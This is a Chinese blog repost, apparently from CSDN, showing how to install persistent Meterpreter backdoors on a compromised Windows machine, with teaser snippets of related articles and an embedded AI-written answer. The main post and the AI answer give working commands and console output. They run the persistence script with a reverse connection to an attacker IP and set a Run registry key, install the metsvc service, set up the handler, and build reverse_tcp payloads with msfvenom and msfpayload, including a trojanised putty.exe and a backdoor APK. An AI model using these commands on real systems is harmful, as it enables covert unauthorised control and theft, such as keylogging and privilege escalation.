Meterpreter 建立持久后门 backdoor

最新推荐文章于 2024-05-31 19:24:06 发布
转载 最新推荐文章于 2024-05-31 19:24:06 发布 · 1w 阅读 · 23

安装后门方法一:
meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108


Persistent agent script is 609628 bytes long
RunningPersistance Script
Resource filefor cleanup created at /root/.msf4/logs/persistence/EMASTER-8G5WOLV_20131206.5032/EMASTER-8G5WOLV_20131206.5032.rc
CreatingPayload=windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=443
[+] PersistentScript written to C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs Starting the service...
Executingscript C:\WINDOWS\TEMP\lOFkqsGGtNr.vbs
[+] Agentexecuted with PID 1888
Installing intoautorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp
[+] Installedinto autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\tTCmdZkXLp

^9 b5 q" j
然后它就在目标机的C:/windows/Temp/下建立一个vbs文件,开机会启动这个文件上面的vbs的确存在


  注释,反弹时间间隔是5s  端口是443 Metasploit服务器Ip是192.168.0.108,缺点是容易被杀毒软件查杀|9 y$ t
3 X' c  d)W  l$ s
安装后门方法二:
meterpreter >run metsvc
Creating ameterpreter service on port 31337
Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm...

>>Uploading metsrv.dll...
>>Uploading metsvc-server.exe...
>>Uploading metsvc.exe...
* Installingservice metsvc
* Startingservice
Service metsvcsuccessfully installed.
meterpreter>
后门如何利用啊?
   msf > use exploit/multi/handler
   msf  exploit(handler) > set payload windows/metsvc_bind_tcp
   msf  exploit(handler) > set LPORT 31337
   msf  exploit(handler) > set RHOST 192.168.200.140

msf  exploit(handler)> exploit

[权限维持] Windows 权限维持 —— 注册表自启后门
Blue17 の 小窝
02-26 1640
Windows 注册表后门是一种通过修改注册表实现隐蔽持久化访问的恶意手段,通常被攻击者用于维持对受感染系统的控制。其核心原理是通过篡改注册表值,在系统启动、程序运行或特定事件触发时执行恶意代码。本章我们主要是介绍注册表后门中的 “启动项注入” 后门。攻击者通过注册表设置系统或用户登录时的启动项,这样当系统重新启动或者特定用户登录时,就会自动触发后门程序,导致攻击者可以持续控制目标机器。
权限维持:常用后门
f_carey的博客
12-18 1766
权限维持:常用后门1 粘滞键后门1.1 粘滞键1.1.1 设置粘滞键后门1.2 配置开启远程桌面连接1.3 详细建议阅读此处文章2 注册表后门2.1 用注册表添加 nc 后门(metepreter)3 计划任务后门3.1 PowerSploit 中计划任务后门4 WMI 型后门4.1 防御 WMI 型后门5 WEB 后门5.1 weevely5.2 webacoo 后门 配合 Windows 提权文章 1 粘滞键后门 1.1 粘滞键 windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键
Metasploit - Android meterpreter
Nixawk
02-24 3747
Create a malicious apk fileCreate a malicious apk file (backdoor.apk), and raw is our format to output.msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 R > backdoor.apkInstall
meterpreter 持久后门
01-02 851
创建持久后门 当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门。创建持久后门的具体操作步骤如下所示。 (1)激活Meterpreter会话。执行命令如下...
Metapreter实现持续访问,自动化,提权--详细教程
qq_41245301的博客
01-05 953
1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同。EXE_NAME 生成后门文件的文件名称(非必要,用默认)REG_NAME 注册表设置的名称 (非必要,用默认)VBS_NAME VBS脚本的名称 (非必要,用默认)PATH 后门文件的存放路径 (非必要,用默认)SESSION 作用于那个会话。这里会自动执行文件中的命令。
新型 Meterpreter 后门能够在图片中隐藏恶意代码
FreeBuf_的博客
05-31 695
据Cyber Security News消息,ANY.RUN 沙盒分析了一种被称为Meterpreter 的新型后门恶意软件,能利用复杂的隐写技术将恶意有效载荷隐藏在看似无害的图片文件中。基于Meterpreter的攻击从一个包含 PowerShell 脚本的 .NET 可执行文件开始,该脚本会从远程命令与控制 (C2) 服务器下载一张 PNG 图片,该图片可以是一张景色秀丽的风景画,但却隐藏着恶意脚本。
Meterpreter Backdoor
AI.PLAY
06-19 826
Install Backdoormeterpreter >run metsvc Creating ameterpreter service on port 31337 Creating atemporary installation directoryC:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\JszPreYrwkWEm... >>Uploading metsrv.dll.
meterpreter持久后门
weixin_30950887的博客
02-25 540
meterpreter持久后门 背景:meterpreter好是好,但有个大问题,只要目标和本机连接断开一次后就再也连不上了,需要再次用exploit打才行!!! 解决方案:在与目标设备的meterpreter会话中创建一个持久后门(此后门将重新生成一个木马文件,并且该文件将周期性向服务端发送TCP请求) 具体步骤: meterpreter > run persisten...
12.3、后渗透测试--持久后门
无痕的博客
12-13 4016
metasploit后渗透测试--持久后门
metasploitable2渗透:Metasploit攻击VSFTPD2.3.4后门漏洞
qq_43054896的博客
03-25 2644
攻击机 kali:192.168.88.147 靶机 metasploitable2:192.168.88.135 一、主机探测,信息收集 1、利用masscan进行主机端口扫描 使用masscan主要是为了进行快速扫描,查看目标主机metasploitable是否在线,开放端口有哪些 masscan -p 0-65535 --rate 100000 192.168.88.135 根据开放...
通过meterpreter留nc后门
Yale的博客
01-27 2078
在靶机上安装一个netcat后门(包括修改系统注册表及防火墙) 首先我们需要上传我们的nc到靶机上 Uploaded表示上传成功(注:由于靶机是64位,所以自动上传到了syswow64路径下)   接下来我们需要修改注册表的键“HKLM\software\microsoft\windows\currentversion\run” 让nc在启动后执行并且在445端口监听  
Meterpreter 控制持久
Epsilon
03-01 6532
Meterpreter 的 persistence 脚本允许注入 Meterpreter 代理,以确保系统重启之后 Meterpreter 还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。 如下所示,我们运行 persistence 脚本让系统开机自启动 Meterpreter (-X),10秒 (-i 10) 重连一次,使
meterpreter 持久化访问的多种方式
izj007的博客
05-30 6481
meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。 1. 通过persistence脚本 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1
6.1 meterpreter创建后门
robacco的博客
07-31 766
1、使用msfvenom捆绑putty.exe程序,生成后门程序bd_putty.exe。该程序与宿主程序具体相同的功能,当运行后门程序的同时,将运行攻击载荷。 msfvenom -a x64 --platform windows -x /opt/putty.exe -k -p windows/x64/meterpreter_reverse_tcp lhost=192.168.57.128 l...
渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器
冰河的专栏
01-14 2960
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86475550 攻击机:Kali 192.168.75.10 跳板: Metasploitable2 192.168.75.130 目标机: Windows Server 2012 192.168.75.140 这里无法通过Kali(192.168.75.10)主机直接访问...
meterpreter使用详解
lweiheng blog
01-07 4310
meterpreter使用详解 文章目录meterpreter使用详解0 meterpreter简介1 meterpreter控制技巧总结1.1 命令详解1.2 sessions 控制命令1.3 meterpreter收集信息1.3.1 meterpreter 收集windows主机信息1.3.1.1 收集系统信息1.3.1.2 收集本地(域)用户信息1.3.1.3 收集当前用户信息1.3.1.4...
Exp2 后门原理与实践
weixin_30628801的博客
03-29 110
一、实践目标与内容 1.学习内容 使用nc实现win,mac,Linux间的后门连接 meterpreter的应用 MSF POST 模块的应用 2.学习目标 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的安全意识 。 3.概念 后门就是不经过正常认证流程而访问系...
后渗透之meterpreter使用攻略
钻石
01-06 8835
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
【tools】Meterpreter 操作汇总
热门推荐
qq_21193587的博客
06-04 3万+
Meterpreter 介绍 Meterpreter 号称“黑客瑞士军刀”,Meterpreter 是 Metasploit 框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后能够返回一个我们控制通道,例如利用远程过程带哦用 RPC 服务的一个漏洞,当漏洞被触发后,我们选择 Meterpreter 作为攻击载荷,就能够获得目标系统上的一个 Meterpreter Shell 连接。Meterpreter 是 Metasploit 框架的一个扩展模块,可以调用 Metasploit 的
meterperter留后门
最新发布
03-20
<think>好的,用户想了解Meterpreter后门技术的实现原理和使用方法。首先,我需要回顾Meterpreter的基础知识。Meterpreter是Metasploit框架中的一个高级负载,主要用于渗透测试。它采用内存注入技术,运行在目标系统的内存中,不留下磁盘文件,这有助于绕过传统的杀毒软件检测[^1]。 接下来,用户可能需要了解具体的实现原理。Meterpreter通过生成可执行文件或脚本,利用漏洞在目标系统上执行代码,建立反向TCP连接。例如,使用msfvenom生成恶意负载,然后通过社会工程学手段诱导用户执行,从而建立会话。此外,迁移进程的功能也很重要,可以提升后门持久性[^3]。 关于使用方法,用户可能需要具体的步骤指导。比如,使用msfvenom生成不同类型的后门文件,设置监听模块,以及利用MSF的POST模块进行后续操作。这些步骤需要详细说明参数和配置,确保用户能正确实施。同时,要提到编码和加密技术,如shikata_ga_nai,来绕过杀毒软件[^3]。 用户还可能关心如何维持后门持久性,比如注册表添加、计划任务等。此外,迁移进程到合法程序如explorer.exe,以避免被终止,这也是关键点之一[^3]。 最后,需要提醒用户注意法律和道德问题,强调仅在授权环境下使用这些技术。同时,结合参考文献中的后门实践和工具使用,增强回答的可靠性[^2]。 现在要确保回答结构清晰,分点说明原理和使用方法,并附上示例代码。同时生成相关问题,帮助用户进一步学习。</think>### Meterpreter后门技术解析 #### 一、实现原理 1. **内存驻留技术** Meterpreter通过注入到目标系统进程内存中运行,不生成磁盘文件,有效绕过传统杀软的文件扫描机制。其通信采用加密信道,支持TCP/HTTP/HTTPS等协议。 2. **模块化扩展机制** 通过动态加载DLL模块实现功能扩展(如键盘记录、屏幕捕获),核心代码仅保留基础通信功能,降低内存占用[^3]。 3. **反向连接控制** 典型工作流程: ```bash 目标机器执行后门 → 主动连接攻击者控制端 → 建立加密通信隧道 → 发送系统权限信息 ``` 这种反向连接方式可绕过目标网络出站限制。 4. **会话迁移技术** 支持通过`migrate`命令将进程注入到稳定系统进程(如`explorer.exe`),避免因原进程终止导致会话断开。 #### 二、使用方法 1. **生成后门程序** 使用msfvenom创建载荷(示例生成Windows可执行文件): ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o backdoor.exe ``` - `-p`指定载荷类型 - `LHOST`为控制端IP - `LPORT`为监听端口 - `-e x86/shikata_ga_nai`可添加编码混淆 2. **启动监听模块** ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 4444 exploit ``` 3. **后门功能操作示例** - 获取系统信息:`sysinfo` - 屏幕截图:`screenshot` - 键盘记录:`keyscan_start` - 文件上传:`upload /local/file C:\\target\\path` - 权限提升:`getsystem` 4. **维持持久化** ```bash run persistence -U -i 5 -p 443 -r 192.168.1.10 ``` - `-U`:用户登录时自启动 - `-i`:重连间隔(秒) - 自动创建注册表启动项 #### 三、防御建议 1. 使用行为分析型杀毒软件检测内存注入 2. 监控异常网络连接(尤其是反向TCP连接) 3. 定期检查系统注册表启动项和计划任务 4. 对敏感进程(如explorer.exe)进行内存保护 ```bash # 检测示例(Windows) netstat -ano | findstr "ESTABLISHED" # 查看异常连接 tasklist /svc # 分析进程关联服务 ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值